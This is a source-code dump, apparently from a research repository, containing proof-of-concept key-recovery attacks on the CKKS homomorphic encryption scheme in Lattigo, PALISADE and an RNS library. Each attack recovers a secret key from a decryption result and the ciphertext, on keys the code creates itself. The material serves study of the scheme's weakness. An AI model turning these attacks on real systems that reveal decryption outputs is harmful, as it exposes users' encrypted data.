:= inftyNorm(ringQ, mError, params.N()) 175 | fmt.Printf("encoding error = %s\n", nm.String()); 176 | printPoly(ringQ, mNoisy, level) 177 | printPoly(ringQ, plaintextTest.Value()[0], level) 178 | // Compute the linear equation m' - c[b] = c[a] * s 179 | if !ciphertext.IsNTT() { panic("ciphertext should be in NTT form") } 180 | rhs := ringQ.NewPolyLvl(level) 181 | ringQ.SubLvl(level, mEncode, ciphertext.Value()[0], rhs) // rhs is in NTT 182 | 183 | aInv := ringQ.NewPolyLvl(level) 184 | InvPolyNTT(ringQ, level, ciphertext.Value()[1], aInv) // aInv is in NTT 185 | 186 | sGuess := ringQ.NewPolyLvl(level) 187 | ringQ.MulCoeffsMontgomeryLvl(level, rhs, aInv, sGuess) // sGuess is in NTT 188 | // ringQ.InvNTTLvl(level, sGuess, sGuess) 189 | 190 | s := sk.Get().CopyNew() 191 | ringQ.InvMForm(s, s) 192 | // ringQ.InvNTT(s, s) 193 | if ringQ.EqualLvl(level, sGuess, s) { 194 | fmt.Printf("Found key!\n") 195 | } else { 196 | fmt.Printf("Failed\n") 197 | } 198 | } 199 | 200 | ////////////////////////////////////////////////// 201 | // Inversion in the cyclotomic ring 202 | ////////////////////////////////////////////////// 203 | 204 | // modular exponential, taken from lattigo/utils/utils.go 205 | func modExp(x, e, p uint64, bredParams []uint64) (result uint64) { 206 | result = 1 207 | for i := e; i > 0; i >>= 1 { 208 | if i&1 == 1 { 209 | result = ring.BRed(result, x, p, bredParams) 210 | } 211 | x = ring.BRed(x, x, p, bredParams) 212 | } 213 | return result 214 | } 215 | 216 | // compute p1^{-1} in the ring r, and return the result in p2 217 | func InvPolyNTT(r *ring.Ring, level uint64, p1, p2 *ring.Poly) { 218 | for i := uint64(0); i < level+1; i++ { 219 | qi := r.Modulus[i] 220 | p1tmp, p2tmp := p1.Coeffs[i], p2.Coeffs[i] 221 | bredParams := r.BredParams[i] 222 | for j := uint64(0); j < r.N; j = j + 8 { 223 | x := (*[8]uint64)(unsafe.Pointer(&p1tmp[j])) 224 | y := (*[8]uint64)(unsafe.Pointer(&p2tmp[j])) 225 | 226 | y[0] = ring.MForm(modExp(x[0], qi-2, qi, bredParams), qi, 
bredParams) 227 | y[1] = ring.MForm(modExp(x[1], qi-2, qi, bredParams), qi, bredParams) 228 | y[2] = ring.MForm(modExp(x[2], qi-2, qi, bredParams), qi, bredParams) 229 | y[3] = ring.MForm(modExp(x[3], qi-2, qi, bredParams), qi, bredParams) 230 | y[4] = ring.MForm(modExp(x[4], qi-2, qi, bredParams), qi, bredParams) 231 | y[5] = ring.MForm(modExp(x[5], qi-2, qi, bredParams), qi, bredParams) 232 | y[6] = ring.MForm(modExp(x[6], qi-2, qi, bredParams), qi, bredParams) 233 | y[7] = ring.MForm(modExp(x[7], qi-2, qi, bredParams), qi, bredParams) 234 | } 235 | } 236 | } 237 | 238 | 239 | func inftyNorm(r *ring.Ring, p *ring.Poly, N uint64) *big.Int { 240 | max := new(big.Int) 241 | 242 | level := uint64(len(p.Coeffs)-1) 243 | 244 | bigintCoeffs := make([]*big.Int, N) 245 | r.PolyToBigint(p, bigintCoeffs) 246 | 247 | QBigInt := ring.NewUint(1) 248 | for i := range r.Modulus[:level+1]{ 249 | QBigInt.Mul(QBigInt, ring.NewUint(r.Modulus[i])) 250 | } 251 | 252 | QHalfBigInt := new(big.Int) 253 | QHalfBigInt.Set(QBigInt) 254 | QHalfBigInt.Rsh(QBigInt, 1) 255 | 256 | // Centers and absolute values 257 | var sign int 258 | for i := range bigintCoeffs{ 259 | sign = bigintCoeffs[i].Cmp(QHalfBigInt) 260 | if sign == 1 || sign == 0 { 261 | bigintCoeffs[i].Sub(bigintCoeffs[i], QBigInt) 262 | bigintCoeffs[i].Abs(bigintCoeffs[i]) 263 | } 264 | } 265 | 266 | for i := uint64(0); i < r.N; i++ { 267 | if bigintCoeffs[i].Cmp(max) > 0 { 268 | max = bigintCoeffs[i] 269 | } 270 | } 271 | return max 272 | } 273 | 274 | func printPoly(r *ring.Ring, p *ring.Poly, level uint64) { 275 | for i := uint64(0); i < level+1; i++ { 276 | // qi := r.Modulus[i] 277 | fmt.Printf("[%d] = %d %d %d %d...\n", r.Modulus[i], p.Coeffs[i][0], p.Coeffs[i][1], p.Coeffs[i][2], p.Coeffs[i][3]) 278 | } 279 | } 280 | 281 | func printComplex(values []complex128) { 282 | fmt.Printf("%6.10f %6.10f %6.10f %6.10f %6.10f %6.10f %6.10f %6.10f...\n", 283 | values[0], values[1], values[2], values[3], values[4], values[5], values[6], 
values[7])
}

func f(x complex128) complex128 {
	return 1 / (cmplx.Exp(-x) + 1)
}

func round(x complex128) complex128 {
	var factor float64
	factor = 100000000
	a := math.Round(real(x)*factor) / factor
	b := math.Round(imag(x)*factor) / factor
	return complex(a, b)
}

func printDebug(params *ckks.Parameters, ciphertext *ckks.Ciphertext, valuesWant []complex128, decryptor ckks.Decryptor, encoder ckks.Encoder) (valuesTest []complex128) {
	valuesTest = encoder.Decode(decryptor.DecryptNew(ciphertext), params.LogSlots())

	fmt.Println()
	fmt.Printf("Level: %d (logQ = %d)\n", ciphertext.Level(), params.LogQLvl(ciphertext.Level()))
	fmt.Printf("Scale: 2^%f\n", math.Log2(ciphertext.Scale()))
	fmt.Printf("ValuesTest: %6.10f %6.10f %6.10f %6.10f...\n", valuesTest[0], valuesTest[1], valuesTest[2], valuesTest[3])
	fmt.Printf("ValuesWant: %6.10f %6.10f %6.10f %6.10f...\n", valuesWant[0], valuesWant[1], valuesWant[2], valuesWant[3])
	fmt.Println()

	precStats := ckks.GetPrecisionStats(params, nil, nil, valuesWant, valuesTest, math.Exp2(53))
	fmt.Println(precStats.String())

	return
}

func main() {
	attack_sigmoid()
}

func maxDiff(a []complex128, b []complex128) (max float64) {
	max = 0
	for i := range a {
		d := a[i] - b[i]
		if math.Abs(real(d)) > max {
			max = math.Abs(real(d))
		}
		if math.Abs(imag(d)) > max {
			max = math.Abs(imag(d))
		}
	}
	return
}

--------------------------------------------------------------------------------
/src/ntl_utils.cpp:
--------------------------------------------------------------------------------
#include "ntl_utils.h"

#include

void showVec(NTL::ZZ const* vals, long size) {
    std::cout << "[";
    std::cout << vals[0];
    for (long i = 1; i < size; ++i) {
        std::cout << ", " << vals[i];
    }
    std::cout << "]" << std::endl;
}


void showVec(NTL::ZZ_p const* vals, long size) {
    std::cout << "{" << NTL::ZZ_p::modulus() << "} [";
    std::cout << vals[0];
    for (long i = 1; i < size; ++i) {
        std::cout << ", " << vals[i];
    }
    std::cout << "]" << std::endl;
}

void showVec(std::vector<std::complex<double>> const* vals, long size) {
    std::cout << "[";
    std::cout << (*vals)[0];
    for (long i = 1; i < size; ++i) {
        std::cout << ", " << (*vals)[i];
    }
    std::cout << "]" << std::endl;
}

NTL::ZZ getZZBal(NTL::ZZ const& zz, NTL::ZZ const& modulus) {
    NTL::ZZ res = zz;
    if (res >= modulus / 2) {
        res = res - modulus;
    }
    return res;
}

void showVecBal(NTL::ZZ_p const* vals, long size) {
    std::cout << "{" << NTL::ZZ_p::modulus() << "} [";
    std::cout << getZZBal(NTL::rep(vals[0]), NTL::ZZ_p::modulus());
    for (long i = 1; i < size; ++i) {
        std::cout << ", " << getZZBal(NTL::rep(vals[i]), NTL::ZZ_p::modulus());
    }
    std::cout << "]" << std::endl;
}

NTL::ZZ maxElm(NTL::ZZ const* aX, int n, NTL::ZZ const& modQ) {
    NTL::ZZ m = NTL::ZZ::zero();
    NTL::ZZ hQ = modQ / 2;
    for (int i=0; i= hQ) {
            d = d - modQ;
        }
        d = abs(d);
        if (m
#include

#include
#include

void showVec(NTL::ZZ const* vals, long size);
void showVec(NTL::ZZ_p const* vals, long size);
void showVec(std::vector<std::complex<double>> const* vals, long size);

NTL::ZZ getZZBal(NTL::ZZ const& zz, NTL::ZZ const& modulus);
void showVecBal(NTL::ZZ_p const* vals, long size);

void showPoly(NTL::ZZ_pE const* poly, long size);
void showPoly(NTL::ZZ_pX const* poly, long size);

NTL::ZZ maxElm(NTL::ZZ const* aX, int n, NTL::ZZ const& modQ);

#endif // NTL_UTILS_H

--------------------------------------------------------------------------------
/src/palisade.h:
--------------------------------------------------------------------------------
#ifndef PALISADE_UTILS
#define PALISADE_UTILS
// Helper functions for palisade

#include "utils/inttypes.h"
#include "lattice/elemparams.h"
#include "lattice/ilparams.h"
#include "lattice/ildcrtparams.h"
#include "lattice/ilelement.h"

using namespace lbcrypto;

void printDCRTPoly(DCRTPoly const& p, size_t num);

void printNativePoly(NativePoly const& p, size_t num);

#endif

--------------------------------------------------------------------------------
/src/palisade_attack.cpp:
--------------------------------------------------------------------------------
// Key recovery attack against the PALISADE implementation of CKKS
#include
#include

#include
#include "eval.h"

using namespace lbcrypto;

// ctRes[i] = encryption of x^(2^i), where ct = encryption of x, for 0 <= i <= logDeg
void evalPowerOf2(std::vector<Ciphertext<DCRTPoly>> & ctRes,
        CryptoContext<DCRTPoly> const& cc, Ciphertext<DCRTPoly> const& ct, int logDeg) {
    ctRes.resize(logDeg+1);

    ctRes[0] = ct; // x^(2^0)
    for (int i = 1; i <= logDeg; i++) {
        ctRes[i] = cc->EvalMult(ctRes[i-1], ctRes[i-1]); // x^(2^i)
        ctRes[i] = cc->Rescale(ctRes[i]); // keep it in depth 1
    }
}

// Assume ct = Enc(x), coeff represents a polynomial sum( coeff[i] * x^i )
void evalFunction(Ciphertext<DCRTPoly> & ctRes, CryptoContext<DCRTPoly> const& cc,
        Ciphertext<DCRTPoly> const& ct, std::vector<double> coeff, int evalDeg = -1) {
    int deg = evalDeg == -1 ? coeff.size()-1 : std::min((size_t)evalDeg, coeff.size() - 1); // assume coeff is not empty
    int logDeg = std::floor(std::log2((double)deg));
    std::cout << "evalFunction " << coeff << " to degree " << deg << std::endl;
    std::vector<Ciphertext<DCRTPoly>> ctPow2s(logDeg+1);
    evalPowerOf2(ctPow2s, cc, ct, logDeg);
    ctRes = cc->EvalMult(ct, coeff[1]); // c_1 * x
    ctRes = cc->EvalAdd(ctRes, coeff[0]); // c_1 * x + c_0
    for (int i = 2; i <= deg; i++) {
        if (fabs(coeff[i]) < 1e-27) {
            continue; // Too small, skip this term
        }
        int k = std::floor(std::log2((double)i));
        int r = i - (1 << k); // i = 2^k + r
        Ciphertext<DCRTPoly> tmp = ctPow2s[k]; // x^(2^k)
        while (r > 0) {
            k = std::floor(std::log2((double)r));
            r = r - (1 << k);
            tmp = cc->EvalMult(tmp, ctPow2s[k]);
            tmp = cc->Rescale(tmp);
        }
        tmp = cc->EvalMult(tmp, coeff[i]);
        ctRes = cc->EvalAdd(ctRes, tmp);
    }
    ctRes = cc->Rescale(ctRes); // rescale to depth 1
}

std::vector<double> SIGMOID_COEFF = {1./2,1./4,0,-1./48,0,1./480,0,-17./80640,0,31./1451520,0};
std::vector<double> LOG_COEFF = {0,1,-0.5,1./3,-1./4,1./5,-1./6,1./7,-1./8,1./9,-1./10};
std::vector<double> EXP_COEFF = {1,1,0.5,1./6,1./24,1./120,1./720,1./5040,1./40320,1./362880,1./3628800 };

void evalVariance(Ciphertext<DCRTPoly> & ctRes, CryptoContext<DCRTPoly> const& cc,
        Ciphertext<DCRTPoly> const& ct, uint32_t logBatchSize) {
    std::cout << "evalVariance size = " << (1 << logBatchSize) << std::endl;
    ctRes = cc->EvalMult(ct, ct); // x^2
    ctRes = cc->Rescale(ctRes);
    for (uint32_t i = 1; i <= logBatchSize; i++) {
        Ciphertext<DCRTPoly> tmp = cc->EvalAtIndex(ctRes, 1 << (logBatchSize - i));
        ctRes = cc->EvalAdd(ctRes, tmp);
    }
    double factor = 1.0/((double)(1 << logBatchSize));
    ctRes = cc->EvalMult(ctRes, factor); // 1/batchSize * sum(x^2)
    ctRes = cc->Rescale(ctRes);
}

int attack(uint32_t scaleFactorBits = 40, // bit-length of the scaling factor
           uint32_t logBatchSize = 15,    // Use all slots
           double plainBound = 1.0,       // bound on the plaintext numbers
           int evalDeg = -1,              // Max Taylor polynomial degree to use, default to all
           HomomorphicComputation hc = HC_NOOP // which circuit to evaluate
           ) {
    // Setup CryptoContext
    uint32_t multDepth = 20; // Force the ring dimension to be 2^16
    uint32_t batchSize = pow(2,logBatchSize); // Number of slots
    RescalingTechnique rsTech = EXACTRESCALE;
    SecurityLevel securityLevel = HEStd_128_classic; // 128-bit secure

    CryptoContext<DCRTPoly> cc =
        CryptoContextFactory<DCRTPoly>::genCryptoContextCKKS(
            multDepth, scaleFactorBits, batchSize, securityLevel, 0, rsTech);

    cc->Enable(ENCRYPTION);
    cc->Enable(SHE);
    cc->Enable(LEVELEDSHE);
    std::cout << "CKKS scheme is using ring dimension " << cc->GetRingDimension()
              << ", scalingFactorBits = " << scaleFactorBits
              << ", slots = " << batchSize
              << ", plaintext size bound = " << plainBound
              << ", rescaling tech = " << rsTech
              << ", ciphertext modulus = " << cc->GetElementParams()->GetModulus() << std::endl;

    // Generate the public/private keys
    auto keys = cc->KeyGen();
    // Generate the evaluation key
    cc->EvalMultKeyGen(keys.secretKey);

    if (hc == HC_VARIANCE) {
        // Generate the rotation keys for computing the variance
        std::vector<int32_t> rotIndexSet(logBatchSize);
        for (int32_t i = 0; i < logBatchSize; i++) {
            rotIndexSet[i] = (1 << i);
        }
        cc->EvalAtIndexKeyGen(keys.secretKey, rotIndexSet);
    }

    // The plaintext to be encrypted
    vector<std::complex<double>> xvec(batchSize), resVec(batchSize);
    randomComplexVector(xvec, batchSize, plainBound);
    // Encoding as plaintexts
    Plaintext ptxt = cc->MakeCKKSPackedPlaintext(xvec);

    // Encrypt the encoded vectors
    auto c = cc->Encrypt(keys.publicKey, ptxt);

    Ciphertext<DCRTPoly> ctRes = c->Clone();
    switch (hc) {
        case HC_VARIANCE :
            evalVariance(ctRes, cc, c, logBatchSize);
            break;
        case HC_SIGMOID :
            evalFunction(ctRes, cc, c, SIGMOID_COEFF, evalDeg);
            break;
        case HC_EXP :
            evalFunction(ctRes, cc, c, EXP_COEFF, evalDeg);
            break;
        default :
            ctRes = c; // noop, just copy the input ciphertext
    }
    if (rsTech == EXACTRESCALE) {
        cc->EvalMultMutable(ctRes,1.0); // force rescaling to depth 1 in EXACTRESCALE
    }

    // Approximate decryption
    Plaintext ptxtRes;
    cc->Decrypt(keys.secretKey, ctRes, &ptxtRes);

    // Decode the polynomial plaintext to complex approximate numbers
    shared_ptr<CKKSPackedEncoding> ptxtResEncoded = std::dynamic_pointer_cast<CKKSPackedEncoding>(ptxtRes);
    Poly ptxtResPoly = ptxtResEncoded->GetElement<Poly>();
    ptxtResPoly.SetFormat(COEFFICIENT);
    resVec = ptxtResEncoded->GetCKKSPackedValue();

    // Check computation errors
    std::vector<std::complex<double>> ptRes(batchSize);
    switch (hc) {
        case HC_VARIANCE :
            evalPlainVariance(ptRes, xvec); // evalPlainFunc(ptRes, xvec, coeff, evalDeg);
            break;
        case HC_SIGMOID :
            evalPlainFunc(ptRes, xvec, SIGMOID_COEFF, evalDeg);
            break;
        case HC_EXP :
            evalPlainFunc(ptRes, xvec, EXP_COEFF, evalDeg);
            break;
        default :
            ptRes = xvec; // noop, just copy the plaintext input
    }
    std::cout << "true value = " << ptRes[0] << ", computation error = " << maxDiff(ptRes, resVec)
              << ", relative error = " << relError(ptRes, resVec) << std::endl;

    // Now encode the decrypted approximate numbers to polynomial
    std::cout << "Trying to recover secret key... encode depth = " << ctRes->GetDepth()
              << ", level = " << ctRes->GetLevel()
              << ", scalingFactor = " << std::log2(ctRes->GetScalingFactor()) << std::endl;

    Plaintext ptxtReEnc = cc->MakeCKKSPackedPlaintext(resVec, ctRes->GetDepth(), ctRes->GetLevel());
    shared_ptr<CKKSPackedEncoding> ptxtReEncEncoded = std::dynamic_pointer_cast<CKKSPackedEncoding>(ptxtReEnc);
    ptxtReEncEncoded->Encode();
    DCRTPoly ptxtReEncCRT = ptxtReEncEncoded->GetElement<DCRTPoly>();
    ptxtReEncCRT.SetFormat(EVALUATION);

    Poly ptxtReEncPoly = ptxtReEncCRT.CRTInterpolate();
    ptxtReEncPoly.SetFormat(COEFFICIENT);
    std::cout << "m' norm bits = " << std::log2(ptxtReEncPoly.Norm()) << std::endl;
    Poly error = ptxtResPoly - ptxtReEncPoly;
    std::cout << "Encoding error = " << error.Norm() << std::endl;

    // Retrieve the two components of the ciphertext
    DCRTPoly cb = ctRes->GetElements()[0];
    DCRTPoly ca = ctRes->GetElements()[1];

    ca.SetFormat(EVALUATION);
    cb.SetFormat(EVALUATION);

    // Try to recover the secret key s = (e - cb) / ca
    DCRTPoly caInv = ca.MultiplicativeInverse();
    DCRTPoly sGuess = (ptxtReEncCRT - cb) * caInv;

    // Retrieve the real secret key s
    LPPrivateKey<DCRTPoly> sk(keys.secretKey);

    size_t towersToDrop = sk->GetPrivateElement().GetParams()->GetParams().size() -
                          cb.GetParams()->GetParams().size();
    auto s(sk->GetPrivateElement());
    s.DropLastElements(towersToDrop);

    return (sGuess == s);
}

int main(int argc, char * argv[]) {
    int iter = 1;
    if (argc >= 2) {
        iter = atoi(argv[1]);
    }

    HomomorphicComputation hc = HC_NOOP; // default: just evaluate the identity function
    uint32_t scaleFactorBits = 40; // bit-length of the scaling factor
    uint32_t logBatchSize = 15;    // Use all slots
    double plainBound = 1.0;       // bound on the plaintext numbers
    int evalDeg = -1;              // Max Taylor polynomial degree to use, default to all

    if (argc > 2) {
        hc = parseHC(argv[2]);
    }
    if (argc > 3) {
        uint32_t logN = atoi(argv[3]);
        logBatchSize = logN - 1;
    }
    if (argc > 4) {
        scaleFactorBits = atoi(argv[4]);
    }
    if (argc > 5) {
        plainBound = atof(argv[5]);
    }
    if (argc > 6) {
        evalDeg = atoi(argv[6]);
    }

    int success = 0;
    for (int i = 0; i
#include

using namespace lbcrypto;

double truncate(double number_val, int n) {
    bool negative = false;
    if (number_val == 0) {
        return 0;
    } else if (number_val < 0) {
        number_val = -number_val;
        negative = true;
    }
    // int pre_digits = std::log10(number_val) + 1;
    // if (pre_digits < 17) {
    //     int post_digits = 17 - pre_digits;
    //     double factor = std::pow(10, post_digits);
    //     number_val = std::round(number_val * factor) / factor;
    //     factor = std::pow(10, n);
    //     number_val = std::trunc(number_val * factor) / factor;
    // } else {
    //     number_val = std::round(number_val);
    // }
    int pre_digits = std::ceil(std::log2(number_val));
    if (pre_digits < n) {
        int post_digits = n - pre_digits;
        double factor = std::pow(2.0, post_digits);
        // number_val = std::round(number_val * factor) / factor;
        // factor = std::pow(10, n);
        number_val = std::trunc(number_val * factor) / factor;
    } else {
        number_val = std::round(number_val);
    }
    if (negative) {
        number_val = -number_val;
    }
    return number_val;
}

int attack(int perturbation) {
    // Setup CryptoContext
    uint32_t multDepth = 20; // For this attack the depth is <= 1
    uint32_t scaleFactorBits = 40; // bit-length of the scaling factor
    uint32_t batchSize = 8192; // Number of slots

    SecurityLevel securityLevel = HEStd_128_classic; // HEStd_NotSet or HEStd_128_classic; // 128-bit secure

    CryptoContext<DCRTPoly> cc =
        CryptoContextFactory<DCRTPoly>::genCryptoContextCKKS(
            multDepth, scaleFactorBits, batchSize, securityLevel); // can add additional argument for ring dimension
    cc->Enable(ENCRYPTION);
    cc->Enable(SHE);

    std::cout << "CKKS scheme is using ring dimension " << cc->GetRingDimension() << std::endl;

    // Generate the public/private keys
    auto keys = cc->KeyGen();
    // Generate the evaluation key
    cc->EvalMultKeyGen(keys.secretKey);
    // Generate the rotation key
    cc->EvalAtIndexKeyGen(keys.secretKey, {1, -2});

    // The plaintext to be encrypted
    vector<std::complex<double>> x0 = {{1,0}, {5,0}, {10,0},
                                       {100,0}, {1000,0}, {10000,0},
                                       {100000,0}, {100000,0}};
    for (double i = 1; x0.size() < cc->GetRingDimension()/2; i+=1.05) {
        x0.push_back({1.0/i,0});
    }

    // Encoding as plaintexts
    Plaintext ptxt0 = cc->MakeCKKSPackedPlaintext(x0);

    // Encrypt the encoded vectors
    auto c = cc->Encrypt(keys.publicKey, ptxt0);

    // Approximate decryption
    Plaintext errPtxt;
    cc->Decrypt(keys.secretKey, c, &errPtxt);

    // Recover the DCRT representation by encoding the approximate plaintext
    shared_ptr<CKKSPackedEncoding> errEncoded = std::dynamic_pointer_cast<CKKSPackedEncoding>(errPtxt);

    // double scale = errPtxt->GetScalingFactor();
    // Poly noise = errEncoded->GetElement<Poly>();
    // noise.SetFormat(COEFFICIENT);

    // Poly::Vector noiseVec = noise.GetValues();
    // for (size_t i = 0; i < noise.GetLength(); i++) {
    //     noiseVec[i] = perturbation;
    // }
    // noise.SetValues(noiseVec, COEFFICIENT);

    // Plaintext noisePtxt = cc->MakeCKKSPackedPlaintext(x0);
    // shared_ptr<CKKSPackedEncoding> noiseEncoded = std::dynamic_pointer_cast<CKKSPackedEncoding>(noisePtxt);
    // noiseEncoded->GetElement<Poly>() = noise;
    // noiseEncoded->Decode(multDepth, scale, EXACTRESCALE);

    std::vector<std::complex<double>> errValue = errEncoded->GetCKKSPackedValue();
    // std::vector<std::complex<double>> noiseValue = noiseEncoded->GetCKKSPackedValue();
    // char * TRUNC_DIGIT = getenv("TRUNC_DIGIT");
    // int trunc_digit = TRUNC_DIGIT?atoi(TRUNC_DIGIT):-1;
    for (size_t i = 0; i < errValue.size(); i++) {
        // double ere = errValue[i].real();
        // double eim = errValue[i].imag();
        // size_t pos = -std::round(std::log10(noiseValue[i].real()));
        // ere = truncate(ere, trunc_digit>0 ? trunc_digit : pos);
        // pos = -std::round(std::log10(noiseValue[i].imag()));
        // eim = truncate(eim, trunc_digit>0 ? trunc_digit : pos);
        // errValue[i].real(ere);
        // errValue[i].imag(0); // drop the imaginary part
    }

    std::cout << "Encryption numbers:" << std::endl;
    for (size_t i = 0; i < 20 && i < x0.size(); i++) {
        std::cout << i << " : " << x0[i] << std::endl;
    }

    std::cout << "Use these numbers to recover key:" << std::endl;
    for (size_t i = 0; i < 20 && i < errValue.size(); i++) {
        std::cout << i << " : " << errValue[i] << std::endl;
    }
    double maxErrReal = 0;
    double maxErrImag = 0;
    for (size_t i = 0; i < x0.size(); i++) {
        std::complex<double> diff = x0[i] - errValue[i];
        if (fabs(diff.real()) > maxErrReal) {
            maxErrReal = fabs(diff.real()); // track the magnitude, not the signed value
        }
        if (fabs(diff.imag()) > maxErrImag) {
            maxErrImag = fabs(diff.imag());
        }
    }
    std::cout << "maxErr = " << log2(maxErrReal) << ", " << log2(maxErrImag) << std::endl;

    Plaintext errPtxt1 = cc->MakeCKKSPackedPlaintext(errValue);
    shared_ptr<CKKSPackedEncoding> errEncoded1 = std::dynamic_pointer_cast<CKKSPackedEncoding>(errPtxt1);

    errEncoded1->Encode();
    DCRTPoly eCRT = errEncoded1->GetElement<DCRTPoly>();
    eCRT.SetFormat(EVALUATION);
    Poly ePoly = eCRT.CRTInterpolate();
    ePoly.SetFormat(COEFFICIENT);
    {
        // check the difference between the approx decryption (encoded) and the perturbed poly
        Poly errEncodedPoly = errEncoded->GetElement<Poly>();
        errEncodedPoly.SetFormat(COEFFICIENT);

        Poly diff = ePoly - errEncodedPoly;
        diff.SetFormat(COEFFICIENT);
        std::cout << "|errEncoded - errEncoded1| = " << diff.Norm() << std::endl;
    }

    // Retrieve the two components of the ciphertext
    DCRTPoly cb = c->GetElements()[0];
    DCRTPoly ca = c->GetElements()[1];
    ca.SetFormat(EVALUATION);
    cb.SetFormat(EVALUATION);

    // Try to recover the secret key s = (e - cb) / ca
    DCRTPoly caInv = ca.MultiplicativeInverse();
    DCRTPoly sGuess = (eCRT - cb) * caInv;

    // Retrieve the real secret key s
    LPPrivateKey<DCRTPoly> sk(keys.secretKey);

    size_t towersToDrop = sk->GetPrivateElement().GetParams()->GetParams().size() -
                          cb.GetParams()->GetParams().size();
    auto s(sk->GetPrivateElement());
    s.DropLastElements(towersToDrop);
    return (sGuess == s);
}

int main(int argc, char * argv[]) {
    int iter = 1;
    if (argc >= 2) {
        iter = atoi(argv[1]);
    }
    int perturbation = 0;
    if (argc >= 3) {
        perturbation = atoi(argv[2]);
    }
    int success = 0;
    for (int i = 0; i

void printNativePoly(NativePoly const& p, size_t num) {
    NativePoly pc = p;
    pc.SetFormat(COEFFICIENT);
    std::cout << "Poly [" << pc.GetParams()->GetModulus() << "] " << std::endl;
    NativePoly::Vector const& vi = pc.GetValues();
    for (size_t j = 0; j < vi.GetLength() && j < num; j++) {
        std::cout << vi[j] << ", ";
    }
    std::cout << std::endl;
}

void printDCRTPoly(DCRTPoly const& p, size_t num) {
    DCRTPoly pc = p;
    pc.SetFormat(COEFFICIENT);
    auto params = pc.GetParams();
    std::cout << "DCRTPoly [" << params->GetModulus() << "] " << std::endl;
    for (size_t i = 0; i < params->GetParams().size(); i++) {
        auto modParam = params->GetParams()[i];
        std::cout << " * [" << modParam->GetModulus() << "] ";
        DCRTPoly::PolyType const& pi = pc.GetElementAtIndex(i);
        DCRTPoly::PolyType::Vector const& vi = pi.GetValues();
        for (size_t j = 0; j < vi.GetLength() && j < num; j++) {
            std::cout << vi[j] << ", ";
        }
        std::cout << std::endl;
    }
}

void printPoly(Poly const& p, size_t num) {
    Poly pc = p;
    pc.SetFormat(COEFFICIENT);
    std::cout << "Poly [" << pc.GetParams()->GetModulus() << "] " << std::endl;
    Poly::Vector const& vi = pc.GetValues();
    for (size_t j = 0; j < vi.GetLength() && j < num; j++) {
        std::cout << vi[j] << ", ";
    }
    std::cout << std::endl;
}

--------------------------------------------------------------------------------
/src/palisade_utils.h:
--------------------------------------------------------------------------------
#ifndef PALISADE_UTILS
#define PALISADE_UTILS
// Helper functions for palisade

#include "palisadecore.h"
#include "lattice/ilparams.h"
#include "lattice/ildcrtparams.h"
#include "lattice/poly.h"
#include "lattice/dcrtpoly.h"

using namespace lbcrypto;

void printDCRTPoly(DCRTPoly const& p, size_t num);

void printNativePoly(NativePoly const& p, size_t num);

void printPoly(Poly const& p, size_t num);

#endif

--------------------------------------------------------------------------------
/src/rns_attack.cpp:
--------------------------------------------------------------------------------
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include "eval.h"
#include "ntl_utils.h"

using namespace std;

// Compute the L-infty norm of a - b, where balanced representation is used
uint64_t maxDiff(uint64_t const* a, uint64_t const* b, int n, uint64_t modQ) {
    uint64_t m = 0;
    uint64_t hQ = modQ / 2;
    int64_t ip = static_cast<int64_t>(modQ); // assume modQ < 2^63
    for (int i=0; i<n; i++) {
        int64_t ia = a[i] < hQ ? static_cast<int64_t>(a[i]) : static_cast<int64_t>(a[i]) - ip;
        int64_t ib = b[i] < hQ ? static_cast<int64_t>(b[i]) : static_cast<int64_t>(b[i]) - ip;
        int64_t d = std::abs(ia - ib);
        if (m < static_cast<uint64_t>(d)) {
            m = static_cast<uint64_t>(d);
        }
    }
    return m;
}

// Homomorphic computation
void evalVariance(Scheme & scheme, Ciphertext & ct, long len, Ciphertext & ctRes) {
    std::cout << "Compute variance" << std::endl;
    ctRes = scheme.mult(ct, ct); // Enc((m*p)^2)
    scheme.reScaleByAndEqual(ctRes, 1);
    for (int i=2; i<=len; i*=2) {
        Ciphertext tmp = scheme.leftRotateFast(ctRes, len/i); // tmp = ctRes << len/i
        scheme.addAndEqual(ctRes, tmp); // ctRes += tmp
    }
    scheme.multByConstAndEqual(ctRes, 1/(double)len);
    scheme.reScaleByAndEqual(ctRes, 1);
}

void evalSigmoid(Scheme & scheme, Ciphertext & ct, int evalDeg, Ciphertext & ctRes) {
    std::cout << "Compute sigmoid to degree " << evalDeg << std::endl;
    SchemeAlgo algo(scheme);
    ctRes = algo.sigmoid(ct, evalDeg);
}

void evalExp(Scheme & scheme, Ciphertext & ct, int evalDeg, Ciphertext & ctRes) {
    std::cout << "Compute exponent to degree " << evalDeg << std::endl;
    SchemeAlgo algo(scheme);
    ctRes = algo.exponent(ct, evalDeg);
}

// Key Recovery Attack
int attack(HomomorphicComputation hc, long logN, long L, long logp, double ptBound, long evalDeg) {
    // Generate plaintext input
    long slots = 1L << (logN-1); // use all slots
    complex<double> *val_input = randomRealVector(slots, ptBound);

    // Key generation
    Context context(logN, logp, L, L+1);
    SecretKey secretKey(context);
    Scheme scheme(secretKey, context);
    if (hc == HC_VARIANCE) {
        // Add rotation keys when computing variance
        for (int i=1; i<=slots/2; i*=2) {
            scheme.addLeftRotKey(secretKey, i); // for left shift 1<* val_res = scheme.decode(ptxt_res);

    // Check homomorphic computation error
    std::vector<std::complex<double>> ptIn(val_input, val_input+slots), heRes(val_res, val_res+slots);
    std::vector<std::complex<double>> ptRes(slots);
    switch (hc) {
        case HC_VARIANCE :
            evalPlainVariance(ptRes, ptIn);
            break;
        case HC_SIGMOID :
            evalPlainFunc(ptRes, ptIn, SpecialFunction::SIGMOID);
            break;
        case HC_EXP :
            evalPlainFunc(ptRes, ptIn, SpecialFunction::EXP);
            break;
        default :
            ptRes.assign(val_input, val_input+slots);
    }
    std::cout << "exact value = " << ptRes[0] << ", computation error = " << abs(ptRes[0] - heRes[0])
              << ", relative error = " << relError(ptRes, heRes) << std::endl;


    // **************************************************
    // Key recovery attack
    // **************************************************

    // Recover the encryption error by encoding the approximate plaintext
    Plaintext ptxt_enc = scheme.encode(val_res, slots, ctxt_res.l);

    // Check for encoding error
    uint64_t* ptxt_res_coeff = new uint64_t[context.N]();
    uint64_t* ptxt_enc_coeff = new uint64_t[context.N]();
    copy(ptxt_res.mx, ptxt_res.mx + context.N, ptxt_res_coeff);
    copy(ptxt_enc.mx, ptxt_enc.mx + context.N, ptxt_enc_coeff);
    context.qiINTTAndEqual(ptxt_res_coeff, 0); // to coeff representation
    context.qiINTTAndEqual(ptxt_enc_coeff, 0); // to coeff representation, only 1st tower
